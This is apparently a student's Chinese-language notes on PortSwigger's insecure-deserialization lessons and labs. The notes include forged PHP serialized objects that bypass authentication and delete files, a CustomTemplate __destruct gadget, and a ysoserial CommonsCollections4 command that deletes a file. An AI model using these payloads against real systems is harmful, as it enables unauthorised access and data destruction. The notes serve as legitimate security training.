Portswigger Web Academic 真的顶！

Insecure deserialization

What is serialization?

Serialization is the process of converting complex data structures, such as objects and their fields, into a “flatter” format that can be sent and received as a sequential stream of bytes.

序列化：把对象转换成bytes流，以便向进程内存、文件或是数据库中写入复杂数据( complex data ，我理解的既是图中的object)

Serialization vs deserialization

反序列化Serialization即是把Stream of Bytes再转换成序列化之前的object
不同语言的序列化方式不同，最后可能转换成二进制或者字符串。对象的属性（包括私有属性）也会被转化到Stream of Bytes。如果这个字段不想被序列化，需要标记为”transient”

What is insecure deserialization?

网站反序列化数据时，如果这个数据可以被用户控制，attacker就可能利用被序列化的对象，向程序代码中插入有害信息。

介不还是注入吗？

甚至可能用另一类对象替代一个被序列化的对象。

insecure deserialization is sometimes known as an “object injection” vulnerability.确实是注入

对象的类和预期不符就可能造成意料之外的结果，然后就造成损害了。许多利用反序列化漏洞的攻击，在完成反序列化过程之前，就完成了。因此，即便是网站自身功能不与恶意对象交互，反序列化过程本身就会完成attack。这样的话，即便网站logic使用strongly typed languages，也会受影响。

How do insecure deserialization vulnerabilities arise?

反序列化漏洞出现，一般就是因为对用户可控数据能造成的危害缺乏认识。

有时网站使用额外的安全检查，也不一定有效。因为不可能每种情况都考虑到，而且往往是在反序列化过程后检查，这就晚了。

What is the impact of insecure deserialization?

一般都很严重，因为可以极大地扩大攻击面，允许攻击者重用程序代码，最后可能就rce了。就算不能rce，也会导致越权，任意文件访问和dos攻击。

Exploiting insecure deserialization vulnerabilities

We hope to demonstrate how exploiting insecure deserialization is actually much easier than many people believe. This is even the case during blackbox testing if you are able to use pre-built gadget chains.似乎看到了熟悉的东西，这个gadget chains会是什么呢？

How to identify insecure deserialization

PHP serialization format

php就用mostly human-readable string format，字母代表数据类型，数字代表每一项的长度。

```object with the attributes:

1
2
3

```php
$user->name = "carlos"; 
$user->isLoggedIn = true;

序列化之后：

1	O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}

相应php函数：serialize() unserialize()

Java serialization format

Java使用二进制序列化格式。但是如果知道怎么去辨别一些迹象，还是能分辨出serialized data的。

For example, serialized Java objects always begin with the same bytes, which are encoded as ac ed in hexadecimal and rO0 in Base64.

对Java来说，则需要关注readObject()，这个函数被用来读和反序列化输入流的数据

Manipulating serialized objects

Exploiting some deserialization vulnerabilities can be as easy as changing an attribute in a serialized object.

emmm,第一步：改变属性值。有两种方法可以去利用序列化了的对象：其一，直接编辑 byte stream ；其二，用相应的语言写个脚本，自己创建并序列化一个新对象，这种方法在处理二进制序列化格式时更方便。

Modifying object attributes

When tampering with the data, as long as the attacker preserves a valid serialized object, the deserialization process will create a server-side object with the modified attribute values.

?? 这么简单的吗？

并不是，还需要一个条件：”website uses this cookie to check whether the current user has access to certain administrative functionality.”emmm，真的会有人这样做吗？

“This simple scenario is not common in the wild.”看来大家都有共识XD

LAB: Modifying serialized objects

扬帆起航！

刚开始看了几个包，没头绪，看不到任何byte stream。
看了返回的包后，想起cookie了，发现很像base64，传去decoder，一切就顺理成章起来
emmm ，改错了，弱智了，得在request里改，整成在response里改了
成功出现admin panel
但是并没有完，修改了request包中的字段，浏览器发的cookie还是原来的，还得改浏览器中的cookie
F12 在application栏中修改cookie即可

Modifying data types

不仅可以修改object的属性值，也可以利用预期之外的数据类型。

这里提到，PHP-based logic 尤其易受影响。因为php的比较运算符==在比较不同数据类型时判定得很宽松。emmm，我好像在那个meme上看到过，有点印象，是JavaScript还是PHP来着？

以数字开头的字符串也适用于5 == "5"这一点，PHP会把整个字符串转换成开头得数字，同时忽略其他部分。5 == "5 of something"

This becomes even stranger when comparing a string the integer 0:

0 == "Example string" // true // wtf?

“ Because there is no number, that is, 0 numerals in the string. PHP treats this entire string as the integer 0.”

emmm,很难评价

因此在面对如下代码时

$login = unserialize($_COOKIE) 
if ($login['password'] == $password) { 
// log in successfully 
}

可以使用这一性质”enabling an authentication bypass.“但也是有条件的：

Note that this is only possible because deserialization preserves the data type. If the code fetched the password from the request directly, the 0 would be converted to a string and the condition would evaluate to false.

而且要记得更新type labels 和 length indicators：

Be aware that when modifying data types in any serialized object format, it is important to remember to update any type labels and length indicators in the serialized data too. Otherwise, the serialized object will be corrupted and will not be deserialized.

这里它还推荐了一个扩展：Hackvertor ，在处理二进制数据时，可以把序列化的数据格式化成字符串，并自动更新二进制数据，调整偏移量。

LAB : Modifying serialized data types

题目描述中，”is vulnerable to authentication bypass as a result. “，达到”edit the serialized object in the session cookie to access the administrator account. Then, delete the user carlos.“即可
有了上次的经验，查看cookie，base64解码后为O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"kkbu4w4wcyqhanxqvlp42eocv9o5hxui";}

by the way ,这hackvertor不咋会用啊，它GitHub上写的不是很简单吗？
把access_token 相应length改为1，值改为0。emmm，需不需要改类型呢？我也不知道php里integer缩写成啥啊？
报错PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
序列化不同类型

原来不是hackvertor的问题，我的问题，session中值需要先d_url then d_base64
相应字段改为i:0，再生成新的cookie即可

Using application functionality

除了蠢蠢地检查属性值外，website的功能可能在反序列化了的object上执行危险操作。

举例：“Delete user”功能，删除用户的头像文件是通过“accessing the file path in the $user->image_location attribute.”实现的。如果传个修改过image_location值的object，就可以删除任意文件了。

”Lab是手工做的，但如果自动地 pass data into dangerous methods 来利用漏洞，情况会很有趣“然后引出了下一节，Magic methods

LAB: Using application functionality to exploit insecure deserialization

‘A certain feature invokes a dangerous method on data provided in a serialized object.’，而且这里指明了’the serialized object in the session cookie’
还给了个备用账户，不知道干嘛的

出现了个delete account，先用别的试试，有点明白这个backup account是干嘛的了

1	O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"omu50cbc6k2m7c638uy9j9u15zmv9oa2";s:11:"avatar_link";s:19:"users/wiener/avatar";}

emmm，我猜avatar_link 即指明了头像的地址，改这个。但是，emmm，不大确定这个目录结构怎么回事，放在了users下面吗。emmm，对哦。这是个web application，确实，想错了吧可能我。
以防万一，传个头像上去看下location
emmm，弄巧成拙了，传的lenna图，结果太大了，自己打不开了。
所以我猜测目录结构是/home/Carlos/morale.txt,23个字符
失败力！明白备用账户干嘛的了
也许我想错目录了？
/users/Carlos/morale.txt, 24个字符
好的，俩账户删完了，没解决，太棒了
完了，我也不知道这个咋重置，太棒了
等15分钟
看了眼solution，/home/Carlos/morale.txt这个地址猜的是正确的，但是全是小写，username写错了，悲伤，逆流成河。

Magic methods

“Instead, they are invoked automatically whenever a particular event or scenario occurs.”我不明白？上一个是在删除用户时invoke的，这个难道什么都不需要做？

“ They are sometimes indicated by prefixing or surrounding the method name with double-underscores.”

Developers can add magic methods to a class in order to predetermine what code should be executed when the corresponding event or scenario occurs.

就像创建对象时，执行构造函数那样吗？”One of the most common examples in PHP is __construct(), which is invoked whenever an object of the class is instantiated, similar to Python’s __init__.“😕，我想我接近了正确答案。

通常情况下Magic methods本身没有漏洞。”But they can become dangerous when the code that they execute handles attacker-controllable data“ 他举例说，攻击者如果构造的反序列化对象符合相应条件时，就可以”automatically invoke methods“

”some languages have magic methods that are invoked automatically during the deserialization process.“ 举例：PHP’s unserialize() method looks for and invokes an object’s __wakeup() magic method.还有Java的ObjectInputStream.readObject()Java的Serializable也是可以声明自己的readObject()这个readObject()在反序列化过程中也就会被调用。

我有点明白，为什么上文中举出额外的安全检查也不一定有效了。

” They allow you to pass data from a serialized object into the website’s code before the object is fully deserialized. This is the starting point for creating more advanced exploits.“😕(by the way , 我是真喜欢撇嘴这个表情)

Injecting arbitrary objects

“ injecting arbitrary object types can open up many more possibilities.”攻击者通过控制序列化数据中object的类，来影响反序列化后，反序列化过程中，所执行的代码。

”Deserialization methods do not typically check what they are deserializing.“所以只要是website能用的，可以传，然后被反序列化。攻击者就可以据此，创建任意类的实例。”The unexpected object type might cause an exception in the application logic, but the malicious object will already be instantiated by then.“不明白，🤔，我想可能是说实例化恶意代码，尽管传个别的类对象可能会引起website logic 意料之外的结果，但恶意代码总归是传上去了（？）。

”The attacker can then pass in a serialized object of this class to use its magic method for an exploit.“结合上一节，构造所选取的class还是有所取向的，当然这是”has access to the source code“的情况。

”Classes containing these deserialization magic methods can also be used to initiate more complex attacks involving a long series of method invocations, known as a “gadget chain”.“要来力🙌

Lab: Arbitrary object injection in PHP

这里有个hint我觉得很有帮助，我记得不是23年湾湾那边报了哪个编辑器的洞就是这个：

You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.

虽然但是，我怎么该审计哪个文件啊？我一无所知啊😣

看来只有change mail 一个功能，使用了POST头，直接访问/my-account/change-email~并不行,emmm,应该是php文件吧？但是直接访问/my-account/change-email时显示"Method Not Allowed"
它这个目录结构到底是怎样的呢？
看了眼solution，”From the site map, notice that the website references the file /libs/CustomTemplate.php“
看了个视频，发现是通过burp suite的Target 栏，Site map 发现的，以前都不知道有这个功能。但是它这个是怎么实现的呢？一个扫描器？

好在代码不长还给提示

<?php

class CustomTemplate {
    private $template_file_path;
    private $lock_file_path;

    public function __construct($template_file_path) {
        $this->template_file_path = $template_file_path;
        $this->lock_file_path = $template_file_path . ".lock";
    }

    private function isTemplateLocked() {
        return file_exists($this->lock_file_path);
    }

    public function getTemplate() {
        return file_get_contents($this->template_file_path);
    }

    public function saveTemplate($template) {
        if (!isTemplateLocked()) {
            if (file_put_contents($this->lock_file_path, "") === false) {
                throw new Exception("Could not write to " . $this->lock_file_path);
            }
            if (file_put_contents($this->template_file_path, $template) === false) {
                throw new Exception("Could not write to " . $this->template_file_path);
            }
        }
    }

    function __destruct() {
        // Carlos thought this would be a good idea
        if (file_exists($this->lock_file_path)) {
            unlink($this->lock_file_path);
        }
    }
}

?>

emmm，想当然。构造lock_file_path属性。有一说一，这个unlink()是干嘛的？php的函数，用来删除文件。符合需求。
也可以通过Hackvertor计算string length<@length>/home/carlos/morale.txt<@/length>
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"h8ogciry8yqy8fizpuckdy2ckw32hg3l";s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}不要忘记加最后的;！也不要忘记指出属性名lock_file_path
emmm,整错了？应该构建template_file_path但是php是不是会给它加上.lock？需要截断？
hhhh，做昏头了。忘了这节是干嘛的了？要构建CustomTemplate类的object！
总归还是因为不懂php，不懂前端。
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}其中O:14:是因为类名CustomTemplate长度为14，后边的参数1是因为只有一项属性

Gadget chains

A “gadget” is a snippet of code that exists in the application that can help an attacker to achieve a particular goal.

我原本还以为是什么工具，没想到是application里自带的。

However, the attacker’s goal might simply be to invoke a method that will pass their input into another gadget.

所以是“Gadget chains”是吧？

By chaining multiple gadgets together in this way, an attacker can potentially pass their input into a dangerous “sink gadget”, where it can cause maximum damage.

但是这是怎么做到的呢？这里它还提醒：gadget chain 不是攻击者传过来的payload，它们本身就在website里的。攻击者只是控制传给gadget chain的数据。通常，使用反序列化过程当中的magic method实现，有时被叫做“kick-of gadget”。

In the wild, many insecure deserialization vulnerabilities will only be exploitable through the use of gadget chains.

可能只需要一两步chian，但是想实现更严重的攻击就可能得要“a more elaborate sequence of object instantiations and method invocations.”

在利用反序列化漏洞时，构建gadget chains是关键技能之一。

Working with pre-built gadget chains

人工地去辨认gadget chains会非常困难，没源码时更是几乎不可能。

这里提到“pre-built gadget chains”。有很多工具，可以提供一系列在其它网站上成功利用，已经被发现的chains。就算得不到源码，也能用这些工具很方便地去辨别，利用反序列化漏洞。

This approach is made possible due to the widespread use of libraries that contain exploitable gadget chains.

这让我想起了log4j2和webp的洞（也许后者更为恰当）。

For example, if a gadget chain in Java’s Apache Commons Collections library can be exploited …… balabala

emmm，lib安全很重要。🤔这算不算供应链安全？算什么是软件供应链安全防护？

ysoserial

给出了一个工具。选个目标web用的lib，就可以传入你想执行的代码。”but it is considerably less labor-intensive than constructing your own gadget chains manually.“咱也不知道咋构建。

Note
In Java versions 16 and above, you need to set a series of command-line arguments for Java to run ysoserial. 然后给出了一些命令。我不确定这篇文章是否足够新，不放了。

you can use the following ones to help you quickly detect insecure deserialization on virtually any server:

The URLDNS chain triggers a DNS lookup for a supplied URL.同时由于它不依赖于目标应用所用的library，并且可以运行在任何Java版本上。用来detection是最普适的。
JRMPClient is another universal chain that you can use for initial detection.通过建立TCP连接。
1. Note that you need to provide a raw IP address rather than a hostname.
1. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups.
You can try generating payloads with two different IP addresses: a local one and a firewalled, external one. If the application responds immediately for a payload with a local address, but hangs for a payload with an external address, causing a delay in the response, this indicates that the gadget chain worked because the server tried to connect to the firewalled address. In this case, the subtle time difference in responses can help you to detect whether deserialization occurs on the server, even in blind cases.介玩法也太tm高阶了。

Lab: Exploiting Java deserialization with Apache Commons

”loads the Apache Commons Collections library.“”you can still exploit this lab using pre-built gadget chains“
1. 没什么头绪，工具看来需要指定payload，我决定先用urldns试下
2. 这里毫无头绪直接看了solution
3. 题解：
4. 先登陆账户，然后把个request包送去repeater
5. In Java versions 16 and above:

1
2

java -jar ysoserial-all.jar \ 
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-opens=java.base/java.util=ALL-UNNAMED \ CommonsCollections4 'rm /home/carlos/morale.txt' | base64

这里不是很清楚，为什么payload选用CommonsCollections4也没有哪个教程指出

https://wooyun.js.org/drops/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B7%A5%E5%85%B7ysoserial%E5%88%86%E6%9E%90.html 很遗憾，这是篇wooyun上的文章的archive，只能说ysoserial真的是很老了。
而且这个gadget chains很老，也没有更新，只能在Java15之下的版本运行。我暂且使用archlinux-java set java-11-openjdk来改变Java版本
而且要将base64编码转为URL编码
😔做得云里雾里

PHP Generic Gadget Chains

提到了proof-of-concept tools ： “PHP Generic Gadget Chains” (PHPGGC).

它又强调了一遍说，漏洞还是因为用户可控数据的反序列化导致的，不要怪罪到gadget chains或者libs头上。就算把所有的gadget chain都堵上，不控制这些不可信数据的反序列化过程，也是无济于事。

Lab: Exploiting PHP deserialization with a pre-built gadget chain

phpggc要求php版本大于等于5.6 ，clone下来跑就可以了
那么问题又来了，how to identify the target framework?
ok,看response时发现有一行是注释过的，成功在/cgi-bin/phpinfo.php弹出php信息。接下来就是找了。
翻来覆去不明白，看了眼题解，明白了，超出我的知识储备了已经。序列化的数据中还需要使用SHA-1签名。

因此，我的lab和exploiting之旅就到此为止了。

How to prevent insecure deserialization vulnerabilities

非必要，不对用户输入进行反序列化。
如果确实需要，使用强而有力的措施保证数据没被篡改。比方说，使用数据签名。而且要在反序列化过程之前进行检查

人生边上

Portswigger 不安全的反序列化